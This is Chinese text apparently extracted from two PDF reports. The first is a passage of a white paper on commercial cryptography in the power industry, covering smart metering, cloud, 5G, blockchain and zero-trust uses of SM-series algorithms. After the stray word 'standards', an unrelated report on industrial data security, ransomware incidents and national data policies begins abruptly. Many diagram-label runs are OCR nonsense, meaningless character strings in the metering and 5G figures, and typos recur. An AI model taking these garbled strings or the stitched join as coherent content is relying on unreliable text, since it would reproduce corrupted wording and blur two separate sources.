区采集服务器负载均衡的改变,I 区内部采用协处 理的方式部署,安全接入区内部采用串接方式部署。 图7配网自动化系统数据通信架构图 指令防篡改装置 (I 区侧),装置安装在配电网安全I 区核心 骨干网中进行签名验签协处理,主要完成安全I 区主站系统业务报 文的签名验签工作,并将异常事件进行日志记录。 指令防篡改装置(安全接入区侧),装置串接安装在配电网安 全接入区采集服务器和加密网关之间,主要完成安全接入区侧业务 报文的签名验签工作,并将异常事件进行日志记录。 4.协同办公系统 协同办公是利用网络、计算机、信息化,实现多人沟通、共享、 协同一起办公的一块软件,从而提高办公人员提供方便、快捷、降 低成本,提高效率的一款在线软件。 “i 国网”作为国家电网为内部员工开发的一款协同办公APP, 为用户提供覆盖PC(WINDOWS、MAC、LINUX)、移动终端的即时通讯 应用及服务,PC客户端功能主要面向国网公司所有员工,提供登录 认证、即时通讯、移动日常办公和安全管控等功能。 图 8i国网架构图 终端及应用安全方面, i 国网通过分享控制、界面水印、敏感 词过滤、阅后即焚、双因子认证等技术保证数据安全。身份鉴别安 全方面,采用统一权限平台身份认证及鉴别安全措施。利用CA 系 统 签发的数字证书进行数字证书进行身份鉴别。涉及第三方业务的系 统,采用国家主管机构认证的第三方数字证书。应 用 安 全 方 面 ,通 过集成物联安全接入网关客户端SDK、移动安全监测客户端 SDK、安 全加密 SDK 实现业务数据安全加密与安全监测。网络传输安全方面, 采用HTTPS 安全通道结合业务层国密加密,实现了网络传输保密性 和完整性。并通过物联安全接入网关实现网络传输安全加密。数 据 安全方面, 首先,通过数据加密实现数据存储安全,采用国密 SM4 实现传输与存储的保密性,采用SM3 实现传输与存储的完整性。对 于日志文件内容的设计要求,重要日志信息采用国密SM4加密存储。 为保证服务端数据安全,采取了身份账号认证、第三方认证、分级 授权、基于组织机构的权限管理、国密加密存储、数据脱敏等手段。 密钥管理方面, 针对数字证书、SM2 密 钥 、SM4 密钥的全生命周期管 控如下: 表 1 密钥全生命周期管控表 类型 全生命周期管控 实现方法 数字 证书 生成 统一密码服务平台进行签发。 分发 初始化时在线分发给各客户端 存储 服务端国密算法加密存储,客户端安全 硬件介质或者安全沙箱环境加密存储 更新 随应用更新 注销 程序升级注销、终端遗失注销 电力行业商用密码应用白皮书 数 观 天 下 懂甲方的商密媒体 SM2密 钥 生成 初始化生成,通过硬件生成(加密卡、 加密机)或软件密码模块生成公私密钥 对,密钥长度为256 分发 公钥通过数字证书形式分发,私钥不需 要分发 存储 通过统一密码服务平台数字证书进行 存储或采用国密算法加密存储 更新 随业务协商动态更新 注销 随业务更新动态注销 SM4密 钥 生成 通过硬件生成(加密卡、加密机)或者 软件密码模块随业务交互动态生成,密 钥长度为128,保证一次一密 分发 动态协商的方式生成,无需进行密钥的 分发。 存储 服务端与客户端不涉及存储密钥, 一次 一密 更新 随业务数据交互动态更新, 一次一密 注销 随业务更新动态注销 5.南 方 电 网 密 码 应 用 场 景 随着南方电网数字化转型不断推进,电力生产与信息化融合将 不断加深,各个业务领域横向接口逐步打通,各业务支撑系统的平 台化、集约化、融合化为下一步发展趋势。 公司于2021年正式发布了密码管理办法,规定了南网电网密码 工作相关要求,包括密码应用技术管控、专业人员管理、密码算法 与密钥管理、密码设备与密码系统管理等方面要求,提出各信息系 统应对密码应用进行规划,原则上必须使用公司建设的管理信息系 统、电力监控系统密码服务平台。并按需开展密码设备/密码系统同 城和异地灾备系统建设工作。 同时,结合当前及“十四五”期间业务发展方向,在现有安全 费控体系基础上,围绕“云、管、边、端”各环节设计涵盖系统主 站、计量终端、智能电表的新 一 代智能量测安全体系架构,建立对 身份、数据、指令等关键业务信息的加密认证体系及针对网络安全 日志及流量的采集监测体系,实现基于业务流程的本质安全防护。 数观天下 电力行业商用密码应用白皮书 数 观 天 下 懂甲方的商密媒体 统一客户服务平台 寒国子以建 电子安号 说情加击 在写加生 易 统一密码服务 双方 密研属集 日 备理 萄事计 网级电能量平台 教因子以定 数装是家 传省而安 年候加击 计量自动化系统 发国子认证 工单客名 性安全 序警加注 发行系统 老销穿散 证单中律 孟钢激行 证我观样 统一密码服务 证 东 评备夏行 容 西第 明康计 采集前置系统 态势感知前置 博域以证 探立加解在 日志,减要分行 销协南 度具分析 网电用零 营销系统 测因子认定 工单各名 费控安垒 存域展击 检测系统 明 些 通 区到构测 * 认证增测 负荷管理络端 册 以 证 雪建要控 属处河洁 保集E 配变监测终龋 鼻组认证 氧工加新活 电能量采集终端 种 以 垂 密圳地离 终端安全模块 复交加解茁 测 认证 安全通信模块 密制体酒 集中器 例认定 文加第足 安全芯片 第药口 快安全 住 7 证 电能表 安全通信模块 承明协 毒 图9智能量测安全防护体系应用防护图 智能量测安全防护体系应用防护架构主要涵盖网级平台、省级主 站、终端及电表侧其中网级统一客户服务平台、网级电能量平台依 托统一密码服务实现双因子认证、电子签章、数据脱敏、传输加密、 存储加密等防护功能。省级主站营销系统、计量自动化系统、采集 前置系统、发行系统、检测系统依托统一密码服务实现双因子认证、 工单签名、远控安全、存储加密、密码发行检测、终端接入认证、 传输加密等防护功能。终端侧除各类终端依托终端安全模块实现基 础的身份认证、传输加密等基础安全功能外,负控终端还基于安全 模块实现本地、远程费控安全功能,集中器实现与电表的认证及传 输加密。电表依托安全芯片实现安全费控,与集中器的认证及加密 传输等防护功能。存量终端、电表可依托安全通信模块的通信认证、 密钥协商、密码运算实现存量终端与主站、存量终端与存量电表之 间的双向身份认证及传输加密。 (三)新技术应用场景 1.电 力 云 计 算 国网云平台主要是围绕“国网云”和“调度控制云”两个重要 云平台建设。首先推进“国网云”平台建设,“国网云”平台以“ 一 平台、 一系统、多场景、微应用”为思路,促进企业管理云、公共服 务云向混合架构应用模式的转变,保障企业管理云、公共服务云对 应用高可用、多活等业务能力的提升,实现企业管理云、公共服务 云对电力各类应用的全面支撑。但与此同时,企业管理云、公共服 务云基于云计算、大数据、虚拟化等新技术的应用也带来了新的风 险,需要统筹考虑云平台安全防护措施,结合“国网云”平台当中 身份鉴别、访问控制和通信传输过程中的SM1 、SM3 、SM4 等密码算 法融合,确保“国网云”平台安全、稳定运行。 依据国网公司一体化“国网云”平台和全业务统一数据中心的总 体设计要求,全面推进“调度控制云”平台建设工作,“调度控制 云”的云计算平台为用户供给了虚拟标准操作台,并把该操作台分 发到平板电脑或其他智能设备中。智能终端则通过无线网络覆盖, 经 VPN 与纵向认证等网络加密方法,不受时空限制地连接云计算数 据中心;由此数据通信安全、数据读取安全以及数据存储安全均通 过密码技术进行有效保障。随着智能电网调度技术支持系统在各级 调度的部署与智能变电站 一体化监控系统建设的日益深入,“调度 控制云”已慢慢形成。在未来发展中,“调度控制云”将变成国网 云的中枢神经系统,确保智能电网稳定运行。 云平台安全防护方面,分别从云平台安全防护、云平台虚拟化 安全、云平台租户安全三个层面进行防护: 云平台安全防护主要是采用纵向认证、隔离与访问控制的安全 措施确保国网云平台接口以及对外边界的安全;云平台虚拟化安全 主要是实现访问防护、虚拟隔离、快照保护、镜像安全等安全措施 保证云平台虚拟环境和资源的安全;云平台租户安全主要通过数据 访问权限、云应用安全代理和数据安全保护等措施确保国网云平台 提供安全、稳定的支撑服务。 图10国网电力云平台安全防护能力视图 国网电力云平台融合多种ZUC (祖冲之算法) SM1、SM2、SM3、 SM4、SM7、SM9 等密码算法技术,不仅能够有效解决数据生产、传输、 存储、处理、分析和使用等全生命周期安全问题,还有利于处理网 络基础资源、信息设施、计算分析、应用服务、网络通道、接入终 端等全体系平台安全问题,促进技术融合、产业融合中的全产业链 条安全问题的解决。密码技术助力打通“国网云”和“调度控制云” 数据融通的信任瓶颈,实现信息资源开放共享,利用基于SM2、SM3、 SM7的数据标识、数字签名、数字内容和产权保护等技术,构建真实 有效的、不可抵赖的“数字契约”,为数据资源确权、开放、流通、 交易提供信任基础;另一方面,密码助力疏通资金融通的信任梗阻, 促进融资便利化。为国网数字经济建设提供系统性、全方位的安全 电 力 行 业 商 用 密 码 应 用 白 皮 书 数 观 天 下 甲 方 的 商 密 媒 体 防护。 2.电 力 物 联 网 电力物联网是物联网在智能电网中的应用,其将有效整合通信 基础设施资源和电力系统基础设施资源,实时在线连接能源电力生 产与消费各环节的人、机、物,全面承载并贯通电网生产运行、企 业经营管理和对外客户服务,提高电力系统信息化水平,改善电力 系统现有基础设施利用效率,为电网发、输、变、配、用电等环节 提供重要技术支撑,是支撑我国能源互联网高效、经济、安全运行 的基础设施。 电力物联网将原本孤立的电力设备进行通信串联,打通了封闭 网络的信息通路,在提升电力系统运营便捷的同时,也给电力这 一 传统行业带来了新兴的网络安全风险。 图11电力物联网应用架构 按照电网输电、变电、配电和用电业务的经营现状,电力物联 网的整体框架设计如上图所示,共包括4 层 。 感知层由电力各个终端和现场通信方式组成,主要实现输变配 用各个环节电力终端设备信息的感知和采集。网络层,网络层在整 体架构中介于感知层和平台层之间,主要包括终端通信接入网、传 输网、数据网三个部分。综合运用有线通信、无线通信、卫星通信、 运营商专线、5G 等技术构建电力专用通信系统,形成了电力物联网 的广域连接。平台层,在管理平台实现信息的整合、分析、处理, 为全业务提供水平化支撑。应用层,通过对不同行业电力服务的差 异化决策,面向不同行业提供智能化专业用电服务,实现电力配电、 电力调度的高效化和智能化。其商密数据采用国密算法进行储存, 重要数据加密存储。 国密算法作为我国自主知识产权加密算法,可以融合电力物联 网特点进行部署应用,在其各个层面提高电力物联网的行业安全性, 具体应用需求如下: 在终端加固方面,可在应用安全模块,对硬件安全、特征等利 用数字证书进行检查;在数据传输通道方面,可通过与网关的密钥 协商保障数据完整性,使用SM2 加 密 、SM3 杂凑、安全协议三种技术 完成安全通道的建立;在安全传输硬件方面,使用国产平台安全控 制系统,使用国密加密卡对数据进行加解密;在操作系统方面,采 用国产的经安全验证的操作系统;在身份认证方面,SM9 作为身份标 识密码的一种,使用具有唯一性的各类标识作为公钥进行数据加密 和身份认证,能够简化在加密过程中数字证书的交换问题,可在终 端与平台接入认证方面进行应用。在数据存储方面,其商密数据采 用国密算法进行储存,重要数据加密存储。 密码算法具有数据加密、身份认证的作用,而且在网络边界部 署密码设备还能起到网络隔离的作用,运用国产密码算法有利于提 高安全强度,保障电力系统的安全运行。 3.5G 电 力 虚 拟 专 网 5G 作为第五代移动通信网络,把人与人的连接拓展到了万物互 联,为智慧城市、智慧医疗和智能电网等领域的发展提供了一种更 优的无线解决方案。由于实际通信的需求及业务类型的多样性、未 知性及复杂性等特点,通信网络需适度超前,提前储备,提前满足 未来多元化的业务承载需求。5G 网络新的发展趋势,尤其是5G 新 业务、新架构、新技术,对数据安全和用户隐私保护都提出了新的 挑战。在5G环境下,不仅是人与物的通信,更多的是物与物的通信。 面对成百上亿的物联网设备接入与通信,数据的安全与隐私保护非 常具有挑战性。 5G 电力虚拟专网安全防护提供严格的网络准入认证、安全的数 据传输通道、全面的网络边界安全防护,旨在建成一个融合多业务 多应用的安全可靠的无线通信平台。 电 力 网 络 边 界 安 全 流量清洗 访问控制 安全分域 网络隔离 网络安全大脑 身份认证 入侵检测 工业审计 恶意代码 合规检测 蜜罐溯源 电 力 5G 虚 拟 专 网 安 全 生产控制业务切片 加帝传输 物理安个 管 理 信息业务切片 访问控制 病毒防护 互联网业务切片 态势感知 平台安全 端到端硬切片 端到端软切片 端到端软切片 终 端 身份认证 可信验证 加密芯片 量子密钥 接口管控 病毒防护 安 全 数据加密 合规检测 国密算法 RSA算 法 安全监控 日志审计 图 1 2 5G 电 力 虚 拟 专 网 架 构 图 密 码 技 术 在 5G 电力虚拟专网实际应用,可依层次分为终端侧、 5G 通道、安全接入区、电力业务侧。 图 1 3 电 力 5G 虚拟专网生产控制大区架构图 终端侧:终端数据存储可基于软件密码模块按需采用对称加密 算 法SM4 对敏感数据进行存储加密。电力5G定制化模组集成硬加密 芯片,采用对称加密算法SM1/SM4 对传输数据加密。5G 通道:空口 加密:发送方通过加密算法将明文数据转换为密文数据发送给接收 方,保证数据不被泄露。空口加密特性可以防止gNodeB(5G 基 站 ) 和UE (终端)间的数据被非法拦截或泄露。用户永久身份加密:用 户永久身份SUPI 将以加密形式发送,以防范攻击。SUPI 通过特定加 密 算 法 后 变 为 SUCI 在 空 口 传 送 , 只 有 在 归 属 地 合 法 运 营 商 的 AUSF/UDM 中保存了相应算法和随机数,才可以解开SUCI 获 得 最 终 的 用户永久身份标识。安全接入区侧:终端与安全接入网关之间建立 端到端 SSL/SSAL VPN, 实现数据传输的保密性和完整性保护。采用 量子加密技术,在电力终端和业务侧进行数据加密传输。 4.电力区块链 区块链,就是一个又一个区块组成的链条。每一个区块中保存 了 一 定的信息,它们按照各自产生的时间顺序连接成链条。这个链 条被保存在所有的服务器中,只要整个系统中有 一 台服务器可以工 作,整条区块链就是安全的。这些服务器在区块链系统中被称为节 点,它们为整个区块链系统提供存储空间和算力支持。如果要修改 区块链中的信息,必须征得半数以上节点的同意并修改所有节点中 的信息,而这些节点通常掌握在不同的主体手中,因此篡改区块链 中的信息是 一件极其困难的事。相比于传统的网络,区块链具有两 大核心特点: 一是数据难以篡改、二是去中心化。基于这两个特点, 区块链所记录的信息更加真实可靠 , 可以帮助解决人们互不信任的 问 题 。 区块链场景是商用密码应用的典型场景之 一 ,以国网公司国网 链系统为例 。 国网链主要用于国网公司上链业务系统 , 旨在进一步 完善主链对外公共服务能力 , 加强联盟链管理 、 节点管理 、 智能合 约管理等公共能力建设;实现不同链、不同用户接入;构建稳定且易 于扩展的区块链服务 。 系统主要为业务系统提供上链服务 , 业务系 统将业务数据生成的哈希值以及业务一般数据 , 通过调用上链接口 进行数据上链。 图14 国网链架构图 节点间通信服务安全方面,区块链采用国际标准算法 ECDH 和 国 密 算 法 SM2, 通 过 密 钥 协 商 建 立 安 全 通 信 信 道 , 实 现 安 全 的 信 息 交换,保证节点间的通信安全。采用国密算法SM4, 实现基于对称加 密算法的节点间密文传输,保证平台消息传输的高安全性;采用国 密算法 SM2, 对平台交易以及节点间通信消息进行签名验签,保证 交易和消息通信的完整性和正确性。链上数据存储方面,区块链上 存储数据通过密码学+块链式数据结构实现防篡改,通过分区管理进 行权限控制,业务数据哈希值采用国密摘要算法 SM3 生成并进行上 链存储,业务一般数据采用国密对称加密算法 SM4 加密数据进行存 储,保证数据安全。在网络传输安全方面,采用校验技术或密码技 术保证通信过程中数据的完整性和保密性,互联网传输通道采用 HTTPS 协议保护通信过程中数据保密性、完整性。 5.电力大数据 在新型电力系统和双碳目标及能源数字化转型和低碳转型的 大趋势下,我国能源大数据产业迅猛发展。随着“以电代煤”“以 电代油”“以电代气”等工作不断推进,电能在终端能源消费中的 比重加快提升,电力在某种程度上已经具备了全能型能源的属性, 电力数据要素的放大、叠加、倍增效应日益凸显,电力大数据成为 推动能源革命和数字革命深度融合的重要载体,能源大数据的建设 已成为能源电力行业数字化转型,实现碳中和的重要手段。基于电 力数据的能源大数据中心已在全国多处落地,不少省份多以电网企 业作为承建主力,浙江、四川、重庆、福建等15个省市都已开展能 源大数据建设。国家电网公司通过能源大数据中心将电力数据与政 府、企业、能源上下游数据汇聚整合、共享交换、挖掘分析;整合 能源领域数据和政务领域数据,为政府提供辅助决策服务;开展数 据技术服务和数据流通交易服务,助力企业风险控制、节能减排, 提升企业智慧运营,从而推动数据资产商业化运营。 政府单位 能源企业 科研院所 社会公众 合作共赢 数据共享 价值创造 数据汇聚 输电数据 用电数据 其 他 能 源 1领域 数 据 发电数据 11 水务数据 11 石油数据 it 气象数据 经济数据 政务数据 民生数据 交通数据 图 1 5 能 源 大 数 据 中 心 架 构 图 由于数据天然的流动性,数据在传输、存储、使用等不同形态 之间的转化每时每刻都在发生,因此保障能源大数据安全,需要数 据流转的采集、传输、存储、使用等多个层次环节中,对数据施加 主动式安全防护。对于流动数据防护,密码技术可以提供独特价值, 密码技术直接作用于数据,是最直接有效的主动防护措施,密码技 术可以直接保障数据的机密性和完整性,同时也可以保障信息传递 中的真实性和不可否认性。在电力大数据的采、传、存、用等四个 方面应用密码技术将有效保障数据流动安全。另外如同态加密、安 全多方计算等隐私增强计算技术,可实现多个企业或机构间的数据 共享互联,使数据在共享时实现“最少可用原则”和“最小权限原则”, 让数据在跨组织应用中实现共享与安全兼得,在能源大数据业务场 景有强烈应用需求。另外,在政策层面,由于能源行业的关键基础 设施特性,能源大数据平台属于国家关键信息基础设施,相关法律 法规也要求运营者应当使用商用密码技术进行保护。 在能源大数据的安全防护中,通过密码技术的应用,结合统一 密码服务平台以及数据全生命周期中密码技术的应用,保障了能源 数据在采集、传输、存储、使用等数据流动过程中的安全性。具体 应用方式如下: 数据采集方面:对于采集中的数据,在数据创建时大数据系统 通过调用统一密码服务平台提供的接口实现业务应用数据层面的加 密,加密算法可采用SM2 及 SM9以确保数据提供者身份的真实性及 数据的不可抵赖性,可使用SM3实现对数据完整性的验证。数据传 输方面:在数据传输阶段,需对数据来源进行身份验证并确保数据 的保密性、完整性。因此,应使用符合 GM/T 0022-2014 或 GM/T 0024-2014要求的密码产品,利用加密网关保证数据边界控制与传输 加密安全。可采用SM2、SM9以实现对数据来源的身份验证,通过 SM3 确保数据的完整性,通过SM4实现对数据的保密性上的保护。数据 存储方面:在静态数据存储保护方面,首先,采用数据加密保护数 据存储安全,加密系统密钥由统一密码服务平台管理,通过SM3、SM4 等算法实现密钥安全存储、密钥生命周期管理,确保了数据的完整 性和保密性。再而,采用严格的审批管控措施控制对静态存储数据 的访问,使用SM2、SM9 等算法对访问者的身份进行合法认证。数据 应用方面:在数据共享安全保护方面,积极探索隐私计算技术,实 现面向隐私信息全生命周期保护的计算,在保障数据本身不对外泄 露的前提下实现数据分析计算,通过密文状态下的联合计算方式保 护数据隐私安全。 6.电 力 零 信 任 随着电力系统建设过程中越来越多的大量运用“大云物移智” 以及工控、5G等信息技术的出现,电力的多样性促使用户、设备、 业务以及平台更加复杂化,数据也打破隔阂在用户、设备、业务以 及平台间互相流通。传统的以网络边界防御为主的安全架构逐渐不 能满足新的安全形势的需求,甚至基于传统网络边界的隐含信任成 为最大的安全漏洞,必须要寻找新的安全防护架构。零信任安全架 构凭着“永不信任,持续验证”的理念,逐步成为备受青睐的安全 防护架构。 图16零信任架构图 以端到端安全防护为核心的零信任架构来进行建设;建立以身 份为中心,基于持续信任评估和授权的动态访问控制体系,同时结 合现有安全防护措施实现网络安全防护架构演变,形成电力持续自 适应风险与信任评估网络安全防护体系。 零信任建设是在不打破现有安全防护架构基础上,新增零信任 安全接入区,建设数据通道和控制信道分离的零信任安全控制平台, 动环监控接入边缘代理,并在边缘代理设备安装零信任 agent, 监 控 边代安全可信执行环境、制定各类安全接入基线。 在零信任实践中,密码技术是提供安全信任的基础。零信任关 注身份管理,通过身份管理系统为设备、应用、服务和人员颁发数 字证书,解决身份安全性问题,同时数字证书的应用可以与生物特 征 、OTP 等多种认证手段进行结合,提升其易用性。在具备数字证书 这种高安全身份后,零信任架构中的“双向国密通信信道”及“数据安 全层面的机密性、完整性保护”问题,都可以非常快速、便利地解决。 密码技术不仅是保障零信任体系的安全底座,同时也是提升零信任 体系实施效率的有效手段。 表2 密码技术在零信任体系中的作用 建立设备信任 理立用户信任 建立应用信任 设备证书(及对应私钥) 用户证书(及对应私钥) 软件版本信息 设备环境感知信息 动态令牌(基于密码运算) 代码签名 网络地址和接入方式 生物特征、口令、 ..... 用户行为、属性 持续评估+授权判决 信任评估算法 授权信息完整性(分发) 策略完整性(存 储 ) 建立流量信任 数据机密性 数据完整性 防 火 墙 WAF、 ... 零信任整体密码应用:传输协议通过对原始数据包进行隧道封 装,并使用SM1/SM4 密码算法加密,保证数据的传输安全。 服务端密钥基于国密推荐椭圆曲线的SM2 非对称密钥,其中私 钥保存在密码卡内。预主密钥、主密钥、工作密钥、会话密钥使用 SM2 算法动态协商生成,连接结束即销毁。 服务端密钥:包括服务端签名密钥和服务端加密密钥,基于国 密推荐曲线的SM2 算法非对称密钥对,又称设备密钥,用于握手过 程中服务端身份鉴别和预主密钥的协商。 三 、电力行业商用密码应用面临的挑战 (一)密码应用监管力度持续优化,提高政策推进的全要 素建设 在集团公司政策的引导下,各省级及以上单位在监管力度上能 达到较好的效果,电力行业安全合规和管理规范已经相当完善。但 省级以下相关单位暂无有效的监管手段,相关系统和物理环境改造 存在 一 定的弊端,且老旧业务涉及面广泛,无法有效地推动业务二 次迭代的研发。 (二)密码基础设施统筹规划 目前密码应用投入规模,仍需将支撑电力密码基础设施建设做 为重点工作。电力行业数据隔离、网络隔离和物理隔离的安全防护 能力已经成熟,但数据校验、传输和存储方面还需要完善,密码基 础设施建设将打通数据融通的信任瓶颈,实现信息资源开放共享。 (三)密码系统建设处于传统模式,钻研新型技术能力发 展模型 在设计全新的网络传输方式过程中,电力行业如何实现高效实 时传输、大规模跨层级互联等新型技术体系依旧是较难解决的痛点 问题,因此,需要进行电力定制化的网络协议设计和可信验证机制。 目 前SM1 、SM2 、SM3 、SM4 、SM9等密码算法在“国网云”平台和“调 度控制云”平台中未能做到深度融合,密码的核心技术创新、研发 和生产能力还需要加大资源投入和提高技术培养。 四 、推进建议 ( 一 )高层管理者参与,加强密码应用体系建设 省级公司领导参与到密码发展中,强化领导责任,推动督办密 码规范建设,并设立专职密码岗位提高密码应用的监管力度,告知 领导密码应用状况,加强领导协调密码应用管理工作。 为了保障重要信息系统数据的安全性,电力行业密码应用管理 体系的提升建设必不可少。例如持续提高电力行业密码安全管理制 度,加强组织领导统筹协调密码应用安全管理工作;建立电力行业 密码安全责任体系,权责细化,落实责任追究措施。 (二)建立弹性安全边界,密码服务统 一 化建设 遵循“合法合规、安全高效、集中统一、长效发展”的原则, 严格贯彻落实国家法律法规要求,充分结合企业实际情况,合法依 规建设密码应用服务体系。密码技术应用既要保障业务系统安全性, 也要保证业务系统应用效率。 坚持“统一规划、统一标准、统一建设、统一运营、统一服务”, 建设统一密码应用服务体系。统一规划: 密码应用服务体系的建设 是一个系统工程,密码应用服务体系建设的基本纲领和总体指向, 是密码技术设计和实施的前提与依据,是建立密码应用服务的先决 条件。统 一 标准: 密码应用服务体系建设的基础是统一标准。管理 密码各类标准独立分散的建设模式已经不能满足密码服务建设的要 求,迫切需要建立能够涵盖密码服务,建设密码服务体系统 一标准 的框架。统 一 建设: 电力行业共建设多套密码应用体系,资源过于 分散;应整合资源共同建立一套覆盖整个电力行业的密码应用体系。 统 一 运营: 在高层领导带领下,结合电力自身情况,建立 一套电力 自己的密码应用服务管理制度。 统 一 服务: 提供密码应用服务化能 力,提升密码应用服务管理、服务运维能力。 (三)密码设施完善换代,强化密码技术自主创新 密码技术是保障网络与信息安全的核心技术和基础支持,密码算 法和密码产品的自主可控是确保信息安全的重中之重。为实现密码 算法和密码产品的自主可控,电力行业持续优化密码设备,促进密 码新技术加速研究及持续迭代更新。加快国密算法与自身业务深度 融合;在数据加密、身份鉴别、访问控制、取证溯源等方面尽快将 原有密码算法替换为国密算法,保证基础数据隐私保护中算法的自 主可控。
standards
01 工业数据发展机遇与安全挑战并存 当前,数字经济加快发展推动工业数字化转型提速,国家大数据战略实施带动 工业大数据发展,这一切对更高质、更高效地开发利用工业数据资源提出了明 确需求,为工业数据加快发展提供了重大发展机遇。与此同时,勒索病毒等工 业数据安全威胁有增无减,造成损失日益加大,加之防护与管理缺位、保护力 度不足,工业数据面临的安全风险与挑战不容乐观。 (一)国家战略实施助推工业数据发展提速 国务院2021年12月12日印发《“十四五”数字经济发展规划》,其中明确指出 “数字经济……是以数据资源为关键要素,以现代信息网络为主要载体,以信息 通信技术融合应用、全要素数字化转型为重要推动力……的新经济形态。”工业 是国民经济主导产业,工业数字化是发展数字经济、变革生产方式的基础。工 业数据是工业数字化转型的关键资源,加快工业数字化转型迫切需要加强工业 数据的采集、开发和运用,从而为各类新业态、新模式的发展提供基础保障, 进而推动生产力发展,带动生产方式变革与升级。 2017年12月,习近平总书记在十九届中央政治局第二次集体学习中提出“实施 国家大数据战略”、“推动制造业加速向数字化、网络化、智能化发展”。工 业大数据的应用和发展是实施国家大数据战略的重要内容,而工业数据是决定 工业大数据作用发挥和价值实现的核心基础资源。国家大数据战略的推进实 施,亟需加强对工业数据的更高质、更高效利用,从而提升工业大数据的汇 聚水平、分析质量、应用效果,服务于工业大数据资源共享、产品研发、解决 方案设计、应用服务等功能实现,真正发挥工业大数据价值创造能力。 (二)制造业转型升级激发工业数据新价值 我国工业互联网正处于加速发展阶段,工业互联网数据采集、网络传输、存储 管理、分析应用等能力的实现,工业互联网在感知、分析、控制、决策和管理 等方面的突破和创新,将有力带动对工业数据的原始积累、采集传输、存储交 互和智能挖掘,激发工业数据作为工业互联网关键资源的新价值,与此同时, 01 02 工业互联网平台支持下的应用开发和系统生态将有力推动工业数据分析结果的 应用与实施,从而真正发挥工业数据助力工业互联网创新与可持续发展、推动 工业经济向高质量买进的核心价值。 当前,新一代信息技术与制造业的深度融合发展,促使工业数据成为新的生产 要素资源参与工业生产、运营、服务等各个环节,加快驱动由“制造”向“智 造”的转型升级。随着工业生产从被动式管理向自适应调整的智能化管理方向 发展,以及生产设备运营日益趋于智能化监测预警、检测诊断、设备维护,对 工业制造过程数据和产品数据的分析挖掘与系统模拟更加活跃,有力促进了工 业现场“痛点”问题的发现与解决,工业数据在工业智能化生产运营中持续发 挥促进决策优化、推进提质增效的动力功能。 (三)勒索病毒已成工业数据安全首要威胁 威胁工业数据安全。据国家工业信息安全发展研究中心统计,2021年公开发布 的工业领域勒素事件共50起,较2020年增长达51.5%。电子制造、食品加工、 能源化工等行业遭攻击最多,受攻击对象涵盖美国大型乳制品供应商Schreiber Foods和成品油管道商科洛尼尔 (Colonial Pipeline) 、加拿大跨国无线通信 设备制造商Sierra Wireless,日本电子公司JVCKenwood、 揶威绿色能源公司 Volue 等多家知名企业。勒素攻击导致上述企业大量敏感商业信息遭窃,生产运 营中断,产品供应受到严重影响。 获取经济利益一直是勒索团伙发起攻击的主要目的,而先窃取数据、再利用企 业担心数据泄露的心理来胁迫企业支付赎金,是勒素团伙的惯用威胁手段。工 业领域近年遭受勒索攻击的企业,如钢铁制造商EVRAZ、葡萄牙跨国能源公司 EDP、 巴西电力公司Light S.A等,均被窃取了涵盖大量重要敏感数据文本、图 片、数据库文件等,内容涉及企业生产运营、供应链管理、财务管理等多个方 面,进而被勒素团伙索要超过1000万美元赎金。勒索团伙的频频得手反过来进 一步强化了其以窃取重要数据为威胁手段的勒索活动,助推勒索攻击对工业数 据的安全威胁持续加剧。 工业领域因其运营成本高、数据价值大、社会影响广,日益成为勒索攻击者的 重点目标,新型勒索软件更将工业领域作为首选攻击对象。 03 04 (四)泄露事件多发凸显工业数据保护不足 近年来,全球工业领域数据泄露事件多发,工业数据安全风险呈攀升之势。 Verizon公司连续数年发布的数据泄露调查报告显示,工业领域特别是制造业一 直是数据泄露事件高发地带,2021年发生制造业数据泄露事件共270起,其中 92%的数据窃取活动以获取经济利益为目的,引发数据泄露的原因涉及系统入 侵、社会工程学、操作错误和特权滥用等。数据安全公司Varonis 于2021年对 50家制造企业的40亿个文件进行了分析,发现数据过度暴露问题严重,部分企 业向员工无差别开放数千份敏感文件,44%的企业有超千个活跃的“幽灵用户” 账户,制造业存在巨大的数据泄露风险。 在工业数据泄露事件频发的同时,大多数工业企业自身因管理制度不健全、措 施落实不到位,难以有效防范工业数据安全风险。国家工业信息安全发展研究 中心监测统计,我国暴露在公共互联网上可被辨识的工业控制系统、物联网设 备、工业数据库等数量高达数百万个,多数未采取有效的安全防护策略与手 段,工业数据安全风险普遍存在。俄罗斯网络安全公司Positive Technologies 对工业领域的安全评估表明,由于防护水平不高、网络隔离较差、设备管理不 善、使用软件陈旧,91%的工业组织易受网络渗透等外部攻击,工业数据安全 防护问题不容小觑,风险隐患不容乐观。 主要国家和地区工业数据安全政策 近年来,世界主要国家和地区加快数字经济和数字产业发展进程,作为数字经 济核心要素的数据资源自然成为国家战略要素和关注焦点。在这种情况下,主 要国家和地区纷纷通过出台战略、推进立法、制定标准等措施,加强数据安全 管理,确保数据安全应用。工业数据体量大、增长快,与经济社会发展和国家 安全息息相关,保护工业数据安全也成为主要国家和地区强化数据安全相关举 措的重要内容。 (一)出台战略规划布局工业数据安全 2021年12月12日,国务院发布《“十四五”数字经济发展规划纲要》(以下简 称《纲要》),明确提出开展工业数字化转型应用示范,具体包括实施智能制造 试点示范行动、制定数字化转型路线图、开展数字化转型应用示范和评估等, 05 06 指明了推动工业数字化转型发展的着力点。同时,《纲要》强调“着力强化数 字经济安全体系”,要求“提升数据安全保障水平”。按照《纲要》的总体部 署,工业领域在工业数字化转型过程中,要采取措施确保工业数据安全,具体 包括建立健全工业数据安全治理体系、建立工业数据分类分级保护制度、研究 推进工业数据安全标准体系建设、健全完善工业数据跨境流动安全管理相关制 度规范等,为工业数字化转型中强化工业数据安全保障指明了方向。 2021年6月,美商务部发布《商业数据战略(2021-2024)》,明确商务部将 与私营部门合作,提高商务部生成、收集、存储和分析有关国家经济、人口和 环境数据的能力,将使商务能更好地利用其数据来满足社会当前和新兴的需 求,从而促进创新、推动经济增长。该战略针对工业数据等事关国家经济的数 据,明确提出加强数据安全保护,包括通过技术解决方案来应对长期存在的网 络安全漏洞,出台数据资产保护指南、制定数据安全标准和最佳实践来解决数 据安全保护合理合规问题,实施数据许可制度、保护数据知识产权以确保数据 的适当使用,并推动各利益相关方有效参与数据安全治理来持续提升数据安全 保护能力与水平。 2020年2月,欧盟委员会发布《欧渊数据战略》,从构建跨部门治理框架、加 强数据投入、提升数据素养和构建数据空间方面提出四大支柱性战略措施,井 明确将“工业(制造业)共同数据空间”作为九种共同数据空间之一,强调通 过这一数据空间发挥工业数据的潜在经济价值(预计到2027年达到1.5万亿欧 元)。为维护工业共同数据空间,确保工业数据安全,该战略明确提出将重点 解决工业数据访问和使用的权限问题,将工业数据保护技术(包括工业数据基 